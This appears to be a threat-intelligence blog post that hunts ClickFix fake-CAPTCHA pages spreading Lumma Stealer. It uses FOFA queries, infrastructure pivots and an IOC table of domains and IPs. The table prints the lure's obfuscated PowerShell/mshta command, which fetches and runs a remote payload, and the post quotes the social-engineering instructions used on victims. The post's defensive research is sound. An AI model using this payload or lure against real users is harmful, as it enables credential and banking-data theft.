Hunting clickfix threat (using FOFA)

ecently came across Lumma, so I decided to do some CTI research on this stealer to understand how part of its infrastructure works. Obviously, it's just a piece of malware available to multiple attacker groups, and today’s analysis is based on a specific timeframe (late April 2025) and contextual elements. Enjoy the read.

For those who are unfamiliar, ClickFix is a fake CAPTCHA campaign that prompts users to "verify they are not a robot." Once the test is completed, a PowerShell script is silently executed, downloading a stealer like Lumma. This technique allows for the exfiltration of passwords, cookies, and other sensitive data. The campaign spreads via compromised websites or SEO poisoning.

I'm starting from the fake CAPTCHA lure example described in this article from The Regents of the University of California, where users are tricked into executing malicious commands. This scenario serves as a basis for creating CTI hunting rules to identify similar threats that rely on social engineering and manual command execution.

Source Image : https://it.ucsf.edu/dec-2024-lures-trick-recipients-executing-malicious-commands

From this lure, I established several functional hunting rules on the Chinese search engine FOFA:

Rule 1 : "In the verification window, press Ctrl""Press Enter on your keyboard to finish." URL : https://fofa.info/result?qbase64=IkluIHRoZSB2ZXJpZmljYXRpb24gd2luZG93LCBwcmVzcyBDdHJsIiAiUHJlc3MgRW50ZXIgb24geW91ciBrZXlib2FyZCB0byBmaW5pc2guIg%3D%3D

Result 1:

Comment: Hunting rule from Verification Steps keywords.

Comment: Hunting rule from Verification Steps keywords.

Rule 2 : "In the verification window, press Ctrl + V.”

Result 2

pivot on the hash of the deepseek icon of malicious pages coupled with geolocation in Russia:

An interesting result: “cleepseek” the c and the l forming a d very close together, clever ;)

Looking at an ongoing Lumma campaign, we see that two targets are being used: one targeted at Windows users via a fake Windows update, and one targeted at a fake DeepSeek site.

Let's analyze:

I visited one of the suspicious URLs found using our hunting rule:

hxxps://deepseekdata[.]online/sign-in[.]html

When entering fake credentials, I'm asked if I'm a robot.

When I click in the hitbox to proceed to the captcha step, I'm actually copying a payload to my clipboard. Here it is:

On its part, the malicious page moves on to the next step and waits for me to respond to the following instructions:

This is incredibly clever, as the unwary user only sees the end of the payload. Whereas, if you look ahead...

The payload is complete. (I obviously defanged the URL for illustration).

The payload is complete. (I obviously defanged the URL for illustration purposes). In the same campaign, I found a fake SSL certification renewal page:

Here, copying fake hitboxes doesn't copy any malicious payload, just the instructions. This could be a developer error, the end of a past campaign, or even a future campaign.

Since the URL of this campaign is known/flagged everywhere and attributed to Lumma Stealer, the threat actor (or a security operator) must have taken down the URL, and it is no longer exploitable. So, I'll continue my research to understand more about Clickfix.

So, it's Lumma we're going to hunt here. Let's continue.

I'll return to my malicious Lumma here: hxxps://deepseekdata[.]online/sign-in[.]html

And I'll try a pivot on the reCAPTCHA image:

And I'll try a pivot on the intercom exports found in the source code of the web page. In this case the sentry_dsn:

On FOFA :

hxxps://f305de69cac64a84a494556d5303dc2d@app[.]getsentry[.]com/24287

Pivot !

"This story smells good" (Mbappe meme)

This story smells pretty good: our ASN (13335) is back, a server extension including buckets3 💨 I go to the first URL:

ioc : hxxps[://]da3v492gwmewgyege8[.]roads-uae[.]org

Visiting the URL, I see that it hosts a malicious script:

The script loads resources from dubious servers, such as roads-uae[.]org and sephona[.]digital, and injects an invisible iframe into the page to stealthily manipulate the user. When the user clicks certain buttons (e.g., "Continue to Payment"), they are redirected to a fraudulent payment page that could be used to steal their banking information. The script also hides certain interface elements, such as social login options, to avoid raising suspicion. It integrates Microsoft Clarity to track user actions in order to collect sensitive data. Here is the phishing page that steals victims' banking information:

Once the victim has entered the information, they are redirected to a fake verification page that spins endlessly:

fake verification page: hxxps://pay[.]sephona[.]digital/wait[.]php

IOCs :

Type	Value	Additional Info
Command	powershell -w 1 powershell -Command ('ms]]]ht]]]a]]][.]]]]exe <https://overcoatpassably>[.]shop/Z8UZbPyVpGfdRS/maloy[.]mp4' -replace ']' )	PowerShell command to download a file (.mp4), obfuscated
Comment	# ✅ 'I am not a robot - reCAPTCHA Verification ID: 5669'	Disguised as reCAPTCHA-related activity

Domain / Host	IP Address	Associated URL	ASN	Organization	Location
a[.]deepseekdata[.]online	104.21.47[.]6	hxxps://a[.]deepseekdata[.]online	13335	CLOUDFLARENET	USA / California / San Francisco
deepseekdata[.]online	104.21.47[.]6	—	13335	CLOUDFLARENET	USA / California / San Francisco
ns2[.]windows-update[.]site	172.67.132[.]82	hxxps://windows-update[.]site	13335	CLOUDFLARENET	USA / California / San Francisco
(Not specified)	172.67.169[.]170	hxxps://a[.]deepseekdata[.]online	13335	CLOUDFLARENET	USA / California / San Francisco

The FOFA searches used

"In the verification window, press Ctrl""Press Enter on your keyboard to finish."

"In the verification window, press Ctrl + V.”

"ms]]]ht]]]a]]].]]]exe"

Comment: Hunting rule from malicious commandline using FOFA